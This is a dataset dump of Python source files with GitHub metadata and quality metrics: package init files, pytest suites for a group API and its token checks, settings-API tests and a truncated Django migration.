hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
97b0df8f02861a20742e03acd92d0bcf1d3feb80 | 22 | py | Python | app/h5/views/__init__.py | by46/coffee | f12e1e95f12da7e322a432a6386a1147c5549c3b | [
"MIT"
] | null | null | null | app/h5/views/__init__.py | by46/coffee | f12e1e95f12da7e322a432a6386a1147c5549c3b | [
"MIT"
] | null | null | null | app/h5/views/__init__.py | by46/coffee | f12e1e95f12da7e322a432a6386a1147c5549c3b | [
"MIT"
] | null | null | null | from . import editor
| 11 | 21 | 0.727273 | 3 | 22 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227273 | 22 | 1 | 22 | 22 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8ae8e6838b6e3ecce8e4738645d37b4ab915777e | 25 | py | Python | shhh/views/__init__.py | olaoladapo/shhh | f02fb875559342a118963c22d28dd867e3be282d | [
"MIT"
] | 243 | 2019-09-17T23:29:38.000Z | 2022-03-29T07:29:36.000Z | shhh/views/__init__.py | olaoladapo/shhh | f02fb875559342a118963c22d28dd867e3be282d | [
"MIT"
] | 213 | 2019-09-18T12:52:18.000Z | 2022-03-31T16:07:15.000Z | shhh/views/__init__.py | shiitakepl/shhh | 54fc69ae741a7309d8ba996200fe6fd40b0345eb | [
"MIT"
] | 33 | 2019-09-18T12:59:01.000Z | 2022-03-25T16:42:09.000Z | from .views import views
| 12.5 | 24 | 0.8 | 4 | 25 | 5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8aed914a49d1e8193ef5355c2342167ad3f72f94 | 261 | py | Python | csrank/dataset_reader/__init__.py | helegraf/cs-ranking | a635d59a254e7d4cad06c3e04f7593392e0b9cec | [
"Apache-2.0"
] | null | null | null | csrank/dataset_reader/__init__.py | helegraf/cs-ranking | a635d59a254e7d4cad06c3e04f7593392e0b9cec | [
"Apache-2.0"
] | null | null | null | csrank/dataset_reader/__init__.py | helegraf/cs-ranking | a635d59a254e7d4cad06c3e04f7593392e0b9cec | [
"Apache-2.0"
] | null | null | null | from .choicefunctions import *
from .discretechoice import *
from .dyadranking import *
from .expedia_dataset_reader import ExpediaDatasetReader
from .labelranking import *
from .objectranking import *
from .synthetic_dataset_generator import SyntheticIterator
| 32.625 | 58 | 0.846743 | 27 | 261 | 8.037037 | 0.518519 | 0.230415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10728 | 261 | 7 | 59 | 37.285714 | 0.93133 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c13d9588bd0984c61799a7cf8100c398b9864dfe | 9,093 | py | Python | tests/test_group_resource.py | akebrissman/gateway | 84f8093af854418f64175dd499c021b6d71f85d2 | [
"MIT"
] | null | null | null | tests/test_group_resource.py | akebrissman/gateway | 84f8093af854418f64175dd499c021b6d71f85d2 | [
"MIT"
] | 2 | 2019-10-25T18:58:18.000Z | 2019-11-16T13:10:38.000Z | tests/test_group_resource.py | akebrissman/gateway | 84f8093af854418f64175dd499c021b6d71f85d2 | [
"MIT"
] | 2 | 2019-10-17T09:06:09.000Z | 2019-10-18T10:09:13.000Z |
def test_get_group_no_match(test_client):
api = '/api/group/123456789012345'
headers = {'content-type': 'application/json', 'Authorization': test_client.application.bearer}
response = test_client.get(api, headers=headers)
assert response.status_code == 404
assert response.is_json is True
def test_put_new_group(test_client):
api = '/api/group/123456789012345'
headers = {'content-type': 'application/json', 'Authorization': test_client.application.bearer}
body = '{ "url": "URL New", "name": "123456789012345" }'
response = test_client.put(api, headers=headers, data=body)
assert response.status_code == 200
assert response.is_json is True
def test_put_same_group(test_client):
api = '/api/group/123456789012345'
headers = {'content-type': 'application/json', 'Authorization': test_client.application.bearer}
body = '{ "url": "URL Update", "name": "123456789012345" }'
response = test_client.put(api, headers=headers, data=body)
assert response.status_code == 200
assert response.is_json is True
def test_get_group(test_client):
api = '/api/group/123456789012345'
headers = {'content-type': 'application/json', 'Authorization': test_client.application.bearer}
response = test_client.get(api, headers=headers)
assert response.status_code == 200
assert response.is_json is True
def test_post_group(test_client):
api = '/api/group'
headers = {'content-type': 'application/json', 'Authorization': test_client.application.bearer}
body = '{ "url": "URL 30", "name": "123456789012346" }'
response = test_client.post(api, headers=headers, data=body)
assert response.status_code == 201
assert response.is_json is True
def test_post_same_group(test_client):
api = '/api/group'
headers = {'content-type': 'application/json', 'Authorization': test_client.application.bearer}
body = '{ "url": "URL 30", "name": "123456789012346" }'
response = test_client.post(api, headers=headers, data=body)
assert response.status_code == 409
assert response.is_json is True
def test_get_all_groups(test_client):
api = '/api/group'
headers = {'content-type': 'application/json', 'Authorization': test_client.application.bearer}
response = test_client.get(api, headers=headers)
assert response.status_code == 200
assert response.is_json is True
def test_delete_group(test_client):
api = 'api/group/123456789012345'
headers = {'content-type': 'application/json', 'Authorization': test_client.application.bearer}
response = test_client.delete(api, headers=headers)
assert response.status_code == 200
assert response.is_json is True
def test_delete_same_group(test_client):
api = 'api/group/123456789012345'
headers = {'content-type': 'application/json', 'Authorization': test_client.application.bearer}
response = test_client.delete(api, headers=headers)
assert response.status_code == 200
assert response.is_json is True
def test_get_groups_no_match_(test_client):
api = 'api/group/123456789012345'
headers = {'content-type': 'application/json', 'Authorization': test_client.application.bearer}
response = test_client.get(api, headers=headers)
assert response.status_code == 404
assert response.is_json is True
def test_get_all_group_no_bearer(test_client):
api = '/api/group'
headers = {'content-type': 'application/json'}
response = test_client.get(api, headers=headers)
assert response.status_code == 401
assert response.is_json is True
assert response.json['description'] == "Authorization header is expected"
def test_get_group_no_bearer(test_client):
api = '/api/group/123456789012345'
headers = {'content-type': 'application/json'}
response = test_client.get(api, headers=headers)
assert response.status_code == 401
assert response.is_json is True
assert response.json['description'] == "Authorization header is expected"
def test_put_group_no_bearer(test_client):
api = '/api/group/123456789012345'
headers = {'content-type': 'application/json'}
body = '{ "name": "123456789012345", "group": "Group New" }'
response = test_client.put(api, headers=headers, data=body)
assert response.status_code == 401
assert response.is_json is True
assert response.json['description'] == "Authorization header is expected"
def test_post_group_no_bearer(test_client):
api = '/api/group'
headers = {'content-type': 'application/json'}
body = '{ "url": "URL 30", "name": "123456789012346" }'
response = test_client.post(api, headers=headers, data=body)
assert response.status_code == 401
assert response.is_json is True
assert response.json['description'] == "Authorization header is expected"
def test_delete_group_no_bearer(test_client):
api = 'api/group/123456789012345'
headers = {'content-type': 'application/json'}
response = test_client.delete(api, headers=headers)
assert response.status_code == 401
assert response.is_json is True
assert response.json['description'] == "Authorization header is expected"
def test_get_all_group_invalid_bearer_name(test_client):
api = '/api/group'
headers = {'content-type': 'application/json', 'Authorization': 'NoBearer 123'}
response = test_client.get(api, headers=headers)
assert response.status_code == 401
assert response.is_json is True
assert response.json['description'] == "Authorization header must be a Bearer token"
def test_get_all_group_invalid_bearer_one_part(test_client):
api = '/api/group'
headers = {'content-type': 'application/json', 'Authorization': 'Bearer'}
response = test_client.get(api, headers=headers)
assert response.status_code == 401
assert response.is_json is True
assert response.json['description'] == "Token not found"
def test_get_all_group_invalid_bearer_three_parts(test_client):
api = '/api/group'
headers = {'content-type': 'application/json', 'Authorization': 'Bearer 123 Bearer'}
response = test_client.get(api, headers=headers)
assert response.status_code == 401
assert response.is_json is True
assert response.json['description'] == "Authorization header must be a valid Bearer token"
def test_get_all_group_invalid_pub_key_in_token(test_client):
import os
pub_key = os.getenv("AUTH_PUBLIC_KEY")
os.environ["AUTH_PUBLIC_KEY"] = "ABC"
api = '/api/group'
headers = {'content-type': 'application/json', 'Authorization': test_client.application.bearer}
response = test_client.get(api, headers=headers)
os.environ["AUTH_PUBLIC_KEY"] = pub_key
assert response.status_code == 401
assert response.is_json is True
assert response.json['description'] == "Unable to parse authentication token"
def test_get_all_group_expired_token(test_client_expired_token):
api = '/api/group'
headers = {'content-type': 'application/json', 'Authorization': test_client_expired_token.application.bearer}
response = test_client_expired_token.get(api, headers=headers)
assert response.status_code == 401
assert response.is_json is True
assert response.json['description'] == "Token is expired"
def test_get_all_group_missing_kid_in_token(test_client_missing_kid_in_token):
api = '/api/group'
headers = {'content-type': 'application/json', 'Authorization': test_client_missing_kid_in_token.application.bearer}
response = test_client_missing_kid_in_token.get(api, headers=headers)
assert response.status_code == 401
assert response.is_json is True
assert response.json['description'] == "No kid found in token"
def test_get_all_group_invalid_aud_in_token(test_client_invalid_aud_in_token):
api = '/api/group'
headers = {'content-type': 'application/json', 'Authorization': test_client_invalid_aud_in_token.application.bearer}
response = test_client_invalid_aud_in_token.get(api, headers=headers)
assert response.status_code == 401
assert response.is_json is True
assert response.json['description'] == "Incorrect claims, please check the audience and issuer"
def test_get_all_group_invalid_signature_in_token(test_client_invalid_signature_in_token):
api = '/api/group'
headers = {'content-type': 'application/json', 'Authorization': test_client_invalid_signature_in_token.application.bearer}
response = test_client_invalid_signature_in_token.get(api, headers=headers)
assert response.status_code == 401
assert response.is_json is True
assert response.json['description'] == "The signature is not valid"
def test_get_all_group_missing_scope_in_token(test_client_missing_scope_in_token):
api = '/api/group'
headers = {'content-type': 'application/json',
'Authorization': test_client_missing_scope_in_token.application.bearer}
response = test_client_missing_scope_in_token.get(api, headers=headers)
assert response.status_code == 401
assert response.is_json is True
assert response.json['description'] == "No matching scope found in token"
| 41.903226 | 126 | 0.734631 | 1,180 | 9,093 | 5.418644 | 0.073729 | 0.100094 | 0.041289 | 0.108852 | 0.938693 | 0.925086 | 0.882859 | 0.86847 | 0.826556 | 0.819206 | 0 | 0.041931 | 0.150225 | 9,093 | 216 | 127 | 42.097222 | 0.785557 | 0 | 0 | 0.668639 | 0 | 0 | 0.25187 | 0.028157 | 0 | 0 | 0 | 0 | 0.366864 | 1 | 0.142012 | false | 0 | 0.005917 | 0 | 0.147929 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c1e88ccb0c884a2efb8731b8fea70caa5f193152 | 235 | py | Python | core/src/zeit/zett/browser/article.py | rickdg/vivi | 16134ac954bf8425646d4ad47bdd1f372e089355 | [
"BSD-3-Clause"
] | 5 | 2019-05-16T09:51:29.000Z | 2021-05-31T09:30:03.000Z | core/src/zeit/zett/browser/article.py | rickdg/vivi | 16134ac954bf8425646d4ad47bdd1f372e089355 | [
"BSD-3-Clause"
] | 107 | 2019-05-24T12:19:02.000Z | 2022-03-23T15:05:56.000Z | core/src/zeit/zett/browser/article.py | rickdg/vivi | 16134ac954bf8425646d4ad47bdd1f372e089355 | [
"BSD-3-Clause"
] | 3 | 2020-08-14T11:01:17.000Z | 2022-01-08T17:32:19.000Z | import zeit.zett.browser.social
import zeit.cms.browser.interfaces
import zeit.content.article.edit.browser.push
class Social(zeit.content.article.edit.browser.push.Social,
zeit.zett.browser.social.SocialBase):
pass
| 26.111111 | 59 | 0.770213 | 32 | 235 | 5.65625 | 0.4375 | 0.165746 | 0.165746 | 0.232044 | 0.364641 | 0.364641 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123404 | 235 | 8 | 60 | 29.375 | 0.878641 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.166667 | 0.5 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
c1ea15bdd4c56504f40b2f8c994059470b7260a2 | 47 | py | Python | testPackage/myPackage/modTwo.py | stevejryan/PythonPackagingTemplate | 82e2715a150f8a018b03fee9f2c6238f2680d9f6 | [
"MIT"
] | 1 | 2020-10-01T03:07:40.000Z | 2020-10-01T03:07:40.000Z | testPackage/myPackage/modTwo.py | stevejryan/PythonPackagingTemplate | 82e2715a150f8a018b03fee9f2c6238f2680d9f6 | [
"MIT"
] | null | null | null | testPackage/myPackage/modTwo.py | stevejryan/PythonPackagingTemplate | 82e2715a150f8a018b03fee9f2c6238f2680d9f6 | [
"MIT"
] | null | null | null | def funcTwo():
print("can you add stuff?")
| 15.666667 | 31 | 0.617021 | 7 | 47 | 4.142857 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.212766 | 47 | 2 | 32 | 23.5 | 0.783784 | 0 | 0 | 0 | 0 | 0 | 0.382979 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
c1ea25295131a5a10607c697e27c15916038e442 | 2,214 | py | Python | tests/test_settings.py | neuroio/neuroio-python | 160f96515877e5e2ee0e888b7424c77cb2d7496a | [
"MIT"
] | null | null | null | tests/test_settings.py | neuroio/neuroio-python | 160f96515877e5e2ee0e888b7424c77cb2d7496a | [
"MIT"
] | 6 | 2021-09-06T08:23:09.000Z | 2021-11-10T16:19:20.000Z | tests/test_settings.py | neuroio/neuroio-python | 160f96515877e5e2ee0e888b7424c77cb2d7496a | [
"MIT"
] | null | null | null | import pytest
import respx
from neuroio.constants import API_BASE_URL
@respx.mock
def test_get_200(client):
request = respx.get(f"{API_BASE_URL}/v1/settings/thresholds/").respond(
status_code=200,
json={"exact": 1, "ha": 1, "junk": 1},
)
response = client.settings.get()
assert request.called
assert response.status_code == 200
assert response.json() == {"exact": 1, "ha": 1, "junk": 1}
@respx.mock
@pytest.mark.asyncio
async def test_async_get_200(async_client):
request = respx.get(f"{API_BASE_URL}/v1/settings/thresholds/").respond(
status_code=200,
json={"exact": 1, "ha": 1, "junk": 1},
)
response = await async_client.settings.get()
assert request.called
assert response.status_code == 200
assert response.json() == {"exact": 1, "ha": 1, "junk": 1}
@respx.mock
def test_update_200(client):
request = respx.patch(f"{API_BASE_URL}/v1/settings/thresholds/").respond(
status_code=200,
json={"exact": 2, "ha": 2, "junk": 2},
)
response = client.settings.update(2, 2, 2)
assert request.called
assert response.status_code == 200
assert response.json() == {"exact": 2, "ha": 2, "junk": 2}
@respx.mock
@pytest.mark.asyncio
async def test_async_update_200(async_client):
request = respx.patch(f"{API_BASE_URL}/v1/settings/thresholds/").respond(
status_code=200,
json={"exact": 2, "ha": 2, "junk": 2},
)
response = await async_client.settings.update(2, 2, 2)
assert request.called
assert response.status_code == 200
assert response.json() == {"exact": 2, "ha": 2, "junk": 2}
@respx.mock
def test_reset_200(client):
request = respx.post(
f"{API_BASE_URL}/v1/settings/thresholds/reset/"
).respond(status_code=200)
response = client.settings.reset()
assert request.called
assert response.status_code == 200
@respx.mock
@pytest.mark.asyncio
async def test_async_reset_200(async_client):
request = respx.post(
f"{API_BASE_URL}/v1/settings/thresholds/reset/"
).respond(status_code=200)
response = await async_client.settings.reset()
assert request.called
assert response.status_code == 200
| 27 | 77 | 0.661247 | 305 | 2,214 | 4.645902 | 0.131148 | 0.084686 | 0.110092 | 0.046577 | 0.91108 | 0.872971 | 0.872971 | 0.872971 | 0.872971 | 0.794637 | 0 | 0.050111 | 0.188799 | 2,214 | 81 | 78 | 27.333333 | 0.738864 | 0 | 0 | 0.693548 | 0 | 0 | 0.148148 | 0.108401 | 0 | 0 | 0 | 0 | 0.258065 | 1 | 0.048387 | false | 0 | 0.048387 | 0 | 0.096774 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
de11326a5967b2d427cd597d6b462e37a3f72445 | 196 | py | Python | nightingale/regression/__init__.py | idin/nightingale | 84b8f8605d8877707b9e3890bbe4523c6fa2e37d | [
"MIT"
] | null | null | null | nightingale/regression/__init__.py | idin/nightingale | 84b8f8605d8877707b9e3890bbe4523c6fa2e37d | [
"MIT"
] | null | null | null | nightingale/regression/__init__.py | idin/nightingale | 84b8f8605d8877707b9e3890bbe4523c6fa2e37d | [
"MIT"
] | null | null | null | from .LogisticRegression import LogisticRegression
from .OLS import OLS
from .GEE import GEE, LogisticGEE
from .Regression import Regression
from .get_regression_model import get_regression_model
| 32.666667 | 54 | 0.862245 | 25 | 196 | 6.6 | 0.36 | 0.157576 | 0.218182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107143 | 196 | 5 | 55 | 39.2 | 0.942857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e73437f0b9b3f534f3fc2393678c25ba1ed948b9 | 124 | py | Python | cassiopeia/dto/spectator.py | artemigkh/cassiopeia | fa78cb8f86ea21857916a707d04de6a05498033e | [
"MIT"
] | 437 | 2016-02-15T17:33:40.000Z | 2022-03-30T21:25:41.000Z | cassiopeia/dto/spectator.py | artemigkh/cassiopeia | fa78cb8f86ea21857916a707d04de6a05498033e | [
"MIT"
] | 296 | 2016-02-13T00:04:15.000Z | 2022-03-24T18:56:36.000Z | cassiopeia/dto/spectator.py | artemigkh/cassiopeia | fa78cb8f86ea21857916a707d04de6a05498033e | [
"MIT"
] | 174 | 2016-02-21T16:34:30.000Z | 2022-03-21T20:46:50.000Z | from .common import DtoObject
class CurrentGameInfoDto(DtoObject):
pass
class FeaturedGamesDto(DtoObject):
pass
| 12.4 | 36 | 0.766129 | 12 | 124 | 7.916667 | 0.666667 | 0.273684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177419 | 124 | 9 | 37 | 13.777778 | 0.931373 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.4 | 0.2 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
e73ac7f4eb178731975006d5716f57c742588e73 | 29 | py | Python | pymapd/dtypes.py | vishalbelsare/pymapd | 36f971f8b49a33287ccc341a30f8c43a36d379a3 | [
"Apache-2.0"
] | 73 | 2018-09-27T14:58:46.000Z | 2021-12-17T02:35:23.000Z | pymapd/dtypes.py | heavyai/pymapd | 36f971f8b49a33287ccc341a30f8c43a36d379a3 | [
"Apache-2.0"
] | 225 | 2018-10-13T12:57:17.000Z | 2021-10-20T23:45:24.000Z | pymapd/dtypes.py | heavyai/pymapd | 36f971f8b49a33287ccc341a30f8c43a36d379a3 | [
"Apache-2.0"
] | 38 | 2018-10-10T11:04:06.000Z | 2021-04-23T20:08:08.000Z | from omnisci.dtypes import *
| 14.5 | 28 | 0.793103 | 4 | 29 | 5.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e74d367023d017289864c7817acb31c0c9e3258c | 35 | py | Python | nevermore/data/datamodule/__init__.py | mmmmmddddd/nevermore | 8ee8904e5bb84184dcb543cec4ca04dc26c6efea | [
"Apache-2.0"
] | 2 | 2021-08-30T09:08:24.000Z | 2021-09-25T16:07:04.000Z | nevermore/data/datamodule/__init__.py | mmmmmddddd/nevermore | 8ee8904e5bb84184dcb543cec4ca04dc26c6efea | [
"Apache-2.0"
] | 3 | 2021-08-30T08:47:04.000Z | 2021-08-31T11:25:26.000Z | nevermore/data/datamodule/__init__.py | mmmmmddddd/nevermore | 8ee8904e5bb84184dcb543cec4ca04dc26c6efea | [
"Apache-2.0"
] | null | null | null | from .nyuv2 import NYUv2DataModule
| 17.5 | 34 | 0.857143 | 4 | 35 | 7.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 0.114286 | 35 | 1 | 35 | 35 | 0.903226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e7b94a6edec32caae91e84b1a124e05f8955ea06 | 3,914 | py | Python | home/migrations/0005_auto_20180823_0920.py | higab85/drugsandme | 7db66d9687ac9a04132de94edda364f191d497d7 | [
"MIT"
] | 3 | 2016-10-10T10:07:39.000Z | 2018-10-29T19:57:52.000Z | home/migrations/0005_auto_20180823_0920.py | higab85/drugsandme | 7db66d9687ac9a04132de94edda364f191d497d7 | [
"MIT"
] | 12 | 2016-11-04T18:59:17.000Z | 2022-03-11T23:32:52.000Z | home/migrations/0005_auto_20180823_0920.py | higab85/drugsandme | 7db66d9687ac9a04132de94edda364f191d497d7 | [
"MIT"
] | 2 | 2016-09-29T22:48:26.000Z | 2019-10-01T19:55:14.000Z | # Generated by Django 2.0.7 on 2018-08-23 09:20
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('home', '0004_auto_20180807_0902'),
]
operations = [
migrations.CreateModel(
name='IndexBlurbEN',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('section_name', models.CharField(blank=True, max_length=50)),
